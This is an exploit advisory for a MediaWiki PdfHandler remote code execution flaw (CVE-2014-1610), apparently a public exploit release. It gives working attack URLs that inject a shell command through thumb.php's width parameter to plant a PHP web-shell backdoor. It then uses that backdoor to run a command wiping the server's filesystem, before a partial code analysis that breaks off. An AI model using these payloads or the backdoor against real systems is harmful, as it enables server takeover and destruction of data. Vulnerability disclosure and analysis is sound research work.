####################################################################
#
# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
# Reported by Netanel Rubin - Check Point’s Vulnerability Research Group (Jan 19, 2014)
# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)
# Affected website : Wikipedia.org and more !
#
# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)
# Release dates : Feb 1, 2014
# Special Thanks to 2600 Thailand !
#
####################################################################
# Exploit:
####################################################################
1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)
http://vulnerable-site/index.php/Special:Upload
2. inject os cmd to upload a php-backdoor
http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20
"<?php%20system(\\$_GET[1]);">images/xnz.php`
3. access to php-backdoor!
http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root
4. happy pwning!!
# Related files:
####################################################################
thumb.php <-- extract all _GET array to params
/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width
options
/includes/media/ImageHandler.php
/includes/GlobalFunctions.php
/includes/filerepo/file/File.php
# Vulnerability Analysis:
####################################################################
1. thumb.php
This script used to resize images if it is configured to be done
when the web browser requests the image
<? ...
1.1 Called directly, use $_GET params
wfThumbHandleRequest();
1.2 Handle a thumbnail request via query parameters
function wfThumbHandleRequest() {
$params = get_magic_quotes_gpc()
? array_map( 'stripslashes', $_GET )
: $_GET; << WTF